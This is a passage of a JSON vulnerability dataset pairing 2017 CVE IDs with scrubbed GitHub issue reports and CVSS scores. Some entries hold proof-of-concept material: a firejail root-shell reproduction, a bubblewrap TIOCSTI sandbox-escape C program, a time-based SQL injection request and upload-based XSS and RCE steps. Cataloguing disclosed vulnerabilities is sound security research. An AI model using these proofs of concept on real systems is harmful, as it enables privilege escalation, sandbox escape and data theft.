        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-5207",
        "Issue_Url_old": "https://github.com/netblue30/firejail/issues/1023",
        "Issue_Url_new": "https://github.com/netblue30/firejail/issues/1023",
        "Repo_new": "netblue30/firejail",
        "Issue_Created_At": "2017-01-06T23:32:15Z",
        "description": "Root shell via bandwidth and shell. APITAG current HEAD, commit NUMBERTAG In a first window run: $ firejail noprofile name=x net=eth0 In a second window, firstly create a dumb shell that ignores APITAG : $ echo 'int APITAG {system( PATHTAG );}' | gcc xc o dumbshell and then secondly invoke that shell via the APITAG and APITAG flags to obtain root: $ firejail APITAG bandwidth=x status id uid NUMBERTAG root) gid NUMBERTAG root) APITAG APITAG Error occurs at URLTAG char arg NUMBERTAG arg NUMBERTAG APITAG arg NUMBERTAG c\"; arg NUMBERTAG cmd; arg NUMBERTAG NULL; APITAG execvp(arg NUMBERTAG arg); I don't see any good reason to permit a user specified shell to run a bandwidth command.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-5226",
        "Issue_Url_old": "https://github.com/projectatomic/bubblewrap/issues/142",
        "Issue_Url_new": "https://github.com/containers/bubblewrap/issues/142",
        "Repo_new": "containers/bubblewrap",
        "Issue_Created_At": "2017-01-09T17:17:37Z",
        "description": "CVETAG bubblewrap escape via TIOCSTI ioctl. On Debian bug APITAG , Federico Bento APITAG writes: > When executing a program via the bubblewrap sandbox, the nonpriv > session can escape to the parent session by using the TIOCSTI ioctl to > push characters into the terminal's input buffer, allowing an attacker > to escape the sandbox. > > This has been assigned CVETAG . > > ` > $ cat test.c > include APITAG > include APITAG > include APITAG > > int APITAG > { > char cmd = \"id \"; > while( cmd) > ioctl NUMBERTAG TIOCSTI, cmd++); > execlp( PATHTAG \"id\", NULL); > } > $ gcc test.c o /tmp/test > $ bwrap ro bind /lib NUMBERTAG lib NUMBERTAG ro bind /home /home ro bind /bin /bin > ro bind /tmp /tmp chdir / unshare pid uid NUMBERTAG tmp/test > id > uid NUMBERTAG gid NUMBERTAG groups NUMBERTAG id < did not type this > uid NUMBERTAG saken) gid NUMBERTAG saken) groups NUMBERTAG saken) I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5345",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/60",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/60",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-06T18:44:45Z",
        "description": "safety problem. APITAG CODETAG I think you know this. CODETAG but it need editor. this is my exp: CODETAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5346",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/61",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/61",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-09T10:27:25Z",
        "description": "[sql injection]. [sql injection NUMBERTAG issue1: PATHTAG APITAG exp1: CODETAG NUMBERTAG issue2: PATHTAG APITAG exp2: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2017-5475",
        "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/439",
        "Issue_Url_new": "https://github.com/s9y/serendipity/issues/439",
        "Repo_new": "s9y/serendipity",
        "Issue_Created_At": "2017-01-12T13:44:39Z",
        "description": "Check CSRF token for comment deletion. As reported by Lee Sheldon Victor: We need to utilize a comment token when calling APITAG (via APITAG to protect against CSRF.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5480",
        "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/35",
        "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/35",
        "Repo_new": "b2evolution/b2evolution",
        "Issue_Created_At": "2017-01-14T07:27:00Z",
        "description": "Delete or read any files on the server. hi: I find a vulnerability in version NUMBERTAG stable, an attacker can exploit this vulnerability to delete or read any files on the server,it can also be used to determine whether a file exists. In PATHTAG parameter APITAG is vulnerable. So an attacker can use PATHTAG to traversal directory. If you want to know more details about the vulnerability, please send me an email.My email is EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5494",
        "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/34",
        "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/34",
        "Repo_new": "b2evolution/b2evolution",
        "Issue_Created_At": "2017-01-14T06:50:16Z",
        "description": "some vulnerabilities. Hi I find some Vulnerabilities in b2evolution CMS\u2019s upload policy. First, all upload filename will not be modifed. It means attacker can guess where the upload file in. Second, comment and avadar allow upload swf file and the swf file will execute by flowplayer_plugin. We know, we can insert script code in flash swf, it means we can code execute through swf file.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-5506",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/354",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/354",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-01-12T16:59:40Z",
        "description": "Double free memory corruption. Valgrind output: ERRORTAG Backtrace: ERRORTAG APITAG URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-5509",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/350",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/350",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-01-10T11:40:37Z",
        "description": "memory corruption Out of bound write . Valgrind output: ERRORTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-5510",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/348",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/348",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-01-07T18:26:54Z",
        "description": "Memory corruption via a PSB file. CODETAG Valgrind output: ERRORTAG ` APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-5511",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/347",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/347",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-01-07T13:58:27Z",
        "description": "Memory corruption via PSB file. CODETAG Valgrind output: ERRORTAG Backtrace: ERRORTAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5515",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/63",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/63",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-13T08:17:55Z",
        "description": "Possible XSS Vulnerabilities in User Prompt Function. Data in APITAG and APITAG is passed directly to the DOM without any filtering, resulting in XSS vulnerability. CODETAG FILETAG Related codes URLTAG URLTAG URLTAG URLTAG Untrusted input data is in different ways, filter the output node may be a good idea. Whats your opinion?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-5516",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/65",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/65",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-13T10:41:13Z",
        "description": "Multiple XSS in FILETAG / FILETAG . Source APITAG line NUMBERTAG APITAG line NUMBERTAG APITAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5517",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/66",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/66",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-14T08:03:42Z",
        "description": "SQL Injection in APITAG . Source URLTAG CODETAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5518",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/64",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/64",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-13T08:58:32Z",
        "description": "Local URIs Server Side Request Forgery. The media uploader allows the attacker to make server send a GET request to intranet addr or anything which can be accessed via IP address. FILETAG APITAG FILETAG So basicly APITAG installations can send unwanted scrape/scan requests on behalf of their user invoked by the attacker. May be we should rewrite some of the interface in elfinder Similar CVE: APITAG NUMBERTAG Local URIs Server Side Request Forgery ( CVETAG ) CVETAG APITAG NUMBERTAG SSRF Bypass using Octal & Hexedecimal IP addresses ( CVETAG ) CVETAG Serendpity SSRF protection bypass using NUMBERTAG redirect CVETAG See how APITAG fix it: URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 4.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5519",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/67",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/67",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-14T09:19:56Z",
        "description": "Multiple SQLI caused by functions in APITAG . Source URLTAG Functions APITAG , APITAG and APITAG do not filter any incoming parameters, resulting in many SQL injections. Here is an example. ERRORTAG Injection NUMBERTAG APITAG line NUMBERTAG CODETAG Injection NUMBERTAG APITAG line NUMBERTAG APITAG then APITAG is parsed into APITAG at APITAG line NUMBERTAG ERRORTAG Injection NUMBERTAG APITAG line NUMBERTAG APITAG There are many similar cases, please check it later.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5520",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/62",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/62",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-13T04:42:40Z",
        "description": "Authenticated Remote Command Execution. Version Github latest APITAG NUMBERTAG Login and request APITAG NUMBERTAG Upload an edited png file with php code in it. FILETAG NUMBERTAG Rename ext to APITAG FILETAG FILETAG NUMBERTAG Request uploaded file FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5537",
        "Issue_Url_old": "https://github.com/WeblateOrg/weblate/issues/1317",
        "Issue_Url_new": "https://github.com/weblateorg/weblate/issues/1317",
        "Repo_new": "weblateorg/weblate",
        "Issue_Created_At": "2017-01-09T10:43:05Z",
        "description": "The existence of a weblate account is guessable. Steps to reproduce NUMBERTAG Login to weblate with a valid email, but wrong password Actual behaviour Weblate displays: APITAG with this email address was not found.\" Expected behaviour Weblate displays: APITAG password or username / email address\" Displaying that a user with this email address is not found, makes it possible to do user enumeration to figure out if an account exists. Since dumps of password / email address are widely available and password re use is a thing, displaying if an account is on the server is a valid thread. The login form also does not seem to implement any rate limiting which makes it easy to bruteforce. Server configuration Standard.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5539",
        "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/36",
        "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/36",
        "Repo_new": "b2evolution/b2evolution",
        "Issue_Created_At": "2017-01-17T02:30:45Z",
        "description": "traversal directory. hi: I'm sorry to find that this patch of traversal directory is flawed in version NUMBERTAG stable\uff0can attacker can alse exploit this vulnerability to delete or read any files on the server,it can also be used to determine whether a file exists. I will send you an email for the details. My email is EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5541",
        "Issue_Url_old": "https://github.com/symphonycms/symphony-2/issues/2639",
        "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2639",
        "Repo_new": "symphonycms/symphonycms",
        "Issue_Created_At": "2017-01-17T03:35:38Z",
        "description": "File Manipulation and Cross Site Scripting in FILETAG . File Manipulation URLTAG APITAG Data from $_POST is passed directly into filepath, attacker may control filepath with injecting APITAG . Cross Site Scripting URLTAG ERRORTAG Here data from APITAG to HTML allows attacker to trigger an XSS with payload llike APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5543",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/297",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/297",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2017-01-17T13:20:39Z",
        "description": "Authorized PHP Object Injection. URLTAG ERRORTAG When ERRORTAG is used on user supplied data it often leads to PHP Object Injection. Attacker may generate a string of serialized object and parse it to server backend via APITAG by submitting a login request . Then func ERRORTAG will trigger APITAG and APITAG method in serialized obj, resulting in code execution. Please check other places where the function ERRORTAG is used.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5545",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/87",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/87",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-01-17T03:56:21Z",
        "description": "APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG d7 at pc NUMBERTAG a NUMBERTAG c bp NUMBERTAG bf NUMBERTAG sp NUMBERTAG bf NUMBERTAG c. I found a heap buffer overflow vulnerability. Should I submit it here and can it be assigned a CVE ID if validated? Should I submit poc after the report is closed? Thanks, here is the stack trace NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG d7 at pc NUMBERTAG a NUMBERTAG c bp NUMBERTAG bf NUMBERTAG sp NUMBERTAG bf NUMBERTAG c READ of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG d7 thread T NUMBERTAG a NUMBERTAG b in main PATHTAG NUMBERTAG b5f7fa NUMBERTAG PATHTAG NUMBERTAG ad NUMBERTAG in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG d7 is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b5e NUMBERTAG d NUMBERTAG b5e NUMBERTAG d3) allocated by thread T0 here NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG ae in main PATHTAG NUMBERTAG b5f7fa NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5574",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/69",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/69",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-20T11:03:40Z",
        "description": "SQL injection in FILETAG APITAG NUMBERTAG latest version). FILETAG CODETAG the activation param leads to sql injection vulnerability POC: CODETAG We'll find that the database version in the response page, which proved the vulnerability exist. By the way, if you can help me apply for a CVE ID, i will be very grateful.XD",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5575",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/68",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/68",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-01-19T05:59:56Z",
        "description": "SQL Injection in APITAG . FILETAG ERRORTAG options SET value APITAG name CODETAG options SET value APITAG name APITAG POC: first, access FILETAG to get a token: APITAG then access follow: CODETAG We'll find that the page is sleep NUMBERTAG seconds, which proved the vulnerability exist.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5608",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/600",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/600",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2017-01-04T05:26:39Z",
        "description": "Cross Site Scripting in image upload.. Latest Version of piwigo is vulnerable to cross site scripting vulnerability in the image upload function, The filename of image can be crafted with malicious payload,which in turn executes while viewing the image. HTTP REQUEST: POST PATHTAG HTTP NUMBERTAG Host: x.x.x.x:xxxx User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Length NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Cookie: APITAG APITAG cid NUMBERTAG APITAG Connection: close NUMBERTAG Content Disposition: form data; name=\"name\" test NUMBERTAG Content Disposition: form data; name=\"chunk NUMBERTAG Content Disposition: form data; name=\"chunks NUMBERTAG Content Disposition: form data; name=\"category NUMBERTAG Content Disposition: form data; name=\"level NUMBERTAG Content Disposition: form data; name=\"pwg_token\" APITAG NUMBERTAG Content Disposition: form data; name=\"file\"; filename=\" payloadhere .png\" Content Type: image/png Malicious script can be passed in the payloadhere section",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5617",
        "Issue_Url_old": "https://github.com/blackears/svgSalamander/issues/11",
        "Issue_Url_new": "https://github.com/blackears/svgsalamander/issues/11",
        "Repo_new": "blackears/svgsalamander",
        "Issue_Created_At": "2017-01-27T07:34:16Z",
        "description": "SSRF APITAG Side Request Forgery) is possible. If the library is being used in a web application for processing user supplied SVG files then the app is vulnerable to SSRF. The attacker can send a specially crafted svg file, for example %% APITAG APITAG APITAG %% and the lib will send the request inside the trusted network to the APITAG (bypassing the firewall). In general, the attacker can use any scheme supported by default (such as APITAG , APITAG etc) or use application specific scheme. How to fix any schemes apart from data in the APITAG attribute should be disallowed by default at URLTAG Additional information: CVETAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 4.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-5638",
        "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/8064",
        "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/8064",
        "Repo_new": "rapid7/metasploit-framework",
        "Issue_Created_At": "2017-03-07T06:21:03Z",
        "description": "CVETAG Apache Struts2 S NUMBERTAG Possible Remote Code Execution when performing file upload based on Jakarta Multipart parser. ... > It is possible to perform a RCE attack with a malicious Content Type value. If the Content Type value isn't valid an exception is thrown which is then used to display an error message to a user. ERRORTAG References URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5834",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/89",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/89",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-01-18T02:20:02Z",
        "description": "heap buffer overflow in parse_dict_node NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG c1a at pc NUMBERTAG a0 bp NUMBERTAG bffd NUMBERTAG sp NUMBERTAG bffd NUMBERTAG c READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG c1a thread T NUMBERTAG f in parse_array_node PATHTAG NUMBERTAG f in parse_bin_node PATHTAG NUMBERTAG a0f3 in parse_bin_node_at_index PATHTAG NUMBERTAG b NUMBERTAG e in plist_from_bin PATHTAG NUMBERTAG a1c4 in main PATHTAG NUMBERTAG b NUMBERTAG ba NUMBERTAG PATHTAG NUMBERTAG ad NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG c1a is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-5836",
        "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/86",
        "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/86",
        "Repo_new": "libimobiledevice/libplist",
        "Issue_Created_At": "2017-01-15T15:44:18Z",
        "description": "Issue in plist_free_data APITAG ERRORTAG Sample base NUMBERTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5875",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/10643",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/10643",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2017-02-06T09:17:56Z",
        "description": "Multiple XSS in APITAG NUMBERTAG Expected Behavior Current Behavior Possible Solution Known Workarounds Steps to Reproduce (for bugs NUMBERTAG Context Your Environment APITAG version used: Browser Name and version: Operating System and version: Application Server and version: Java Brand and version: Database and version: Application module (if apply): The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser. XSS CVETAG APITAG Necessary): POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: es ES,es; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG opvc NUMBERTAG b4f NUMBERTAG adbd NUMBERTAG d6 a NUMBERTAG b d NUMBERTAG a NUMBERTAG fa; sitevisitscookie NUMBERTAG dmid NUMBERTAG f NUMBERTAG d1c NUMBERTAG c NUMBERTAG a NUMBERTAG bb NUMBERTAG APITAG APITAG APITAG APITAG Dl; _gat NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG APITAG APITAG FILETAG XSS CVETAG : GET PATHTAG APITAG f6ba NUMBERTAG b NUMBERTAG adef NUMBERTAG b7ed NUMBERTAG a NUMBERTAG HTTP NUMBERTAG FILETAG XSS CVETAG : GET PATHTAG APITAG FILETAG How to fix: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-5879",
        "Issue_Url_old": "https://github.com/exponentcms/exponent-cms/issues/73",
        "Issue_Url_new": "https://github.com/exponentcms/exponent-cms/issues/73",
        "Repo_new": "exponentcms/exponent-cms",
        "Issue_Created_At": "2017-02-06T09:00:59Z",
        "description": "Time Based SQL Injection Exponent CMS NUMBERTAG and others versions. This is a blind SQL injection that can be exploited by un authenticated users via an HTTP GET request and which can be used to dump database data out to a malicious server, using an out of band technique, such as APITAG The vulnerability affects FILETAG andthe following parameter: src. APITAG example: GET APITAG NUMBERTAG b(select from(select(sleep NUMBERTAG a NUMBERTAG b\\ HTTP NUMBERTAG Host: localhost Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close FILETAG How to fix: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5923",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/597",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/597",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2017-01-23T11:29:59Z",
        "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Git HEAD: APITAG To reproduce: APITAG FILETAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-5924",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/593",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/593",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2017-01-08T11:32:08Z",
        "description": "Use after free in APITAG Use after free in APITAG Tested on latest Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
